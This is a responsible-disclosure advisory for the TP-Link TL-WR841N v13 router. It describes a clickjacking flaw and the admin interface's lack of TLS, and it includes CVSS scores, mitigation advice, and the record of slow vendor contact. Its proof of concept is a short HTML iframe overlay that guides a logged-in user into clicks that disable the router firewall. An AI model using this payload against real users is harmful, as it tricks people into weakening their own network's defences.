• Vulnerability: Clickjacking, Missing HTTPS
  • Affected Software: TP-Link TL-WR841N v13
  • Affected Version: 0.9.1 4.16 v0001.0 Build 180119 Rel.65243n
  • Patched Version: None
  • Risk: Medium
  • Vendor Contacted: 05/20/2018
  • Vendor Fix: None
  • Public Disclosure: 06/27/2018

Clickjacking

CVSS

Medium 4.2 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:L

Description

The web interface of the router fails to prevent Clickjacking. Because of this, an attacker could get an authenticated user to perform actions which only require mouse clicks.

POC

Disable firewall:

<div style="position: absolute; left: 60px; top: 310px; pointer-events: none;">Click 1</div>
<div style="position: absolute; left: 455px; top: 245px; pointer-events: none;">Click 2</div>
<div style="position: absolute; left: 550px; top: 690px; pointer-events: none;">Click 3</div>
<iframe style="opacity: 0.2;" height="1000" width="1000" scrolling="no" src="http://192.168.0.1"></iframe>

Missing HTTPS

CVSS

Medium 4.8 CVSS:3.0/AV:A/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

Description

The web interface does not support TLS. Because of this, an attacker that is present in the same local network could sniff network traffic and thus for example read out the admin password to gain access to the device.

Solution

The vendor did not fix the issues.

Users of the product can try to mitigate the Clickjacking issue by not visiting other websites while being signed into the web interface and signing out as soon as possible. Additionally, various browser plugins can be used to try to defend against attacks.

Timeline
  • 05/20/2018 Requested email address via contact form (no response)
  • 05/24/2018 Send advisory to security@tp-link.com asking for confirmation, set disclosure date (no response)
  • 06/01/2018 Asked for confirmation at support.usa@tp-link.com
  • 06/04/2018 Vendor confirmed receipt of advisory
  • 06/12/2018 Requested Status Update
  • 06/14/2018 Vendor claims they never received advisory
  • 06/14/2018 Resend advisory asking for confirmation (no response)
  • 06/18/2018 Reminded vendor of disclosure date (no response)
  • 06/18/2018 Requested CVE
  • 06/19/2018 CVE assigned
  • 06/27/2018 Disclosure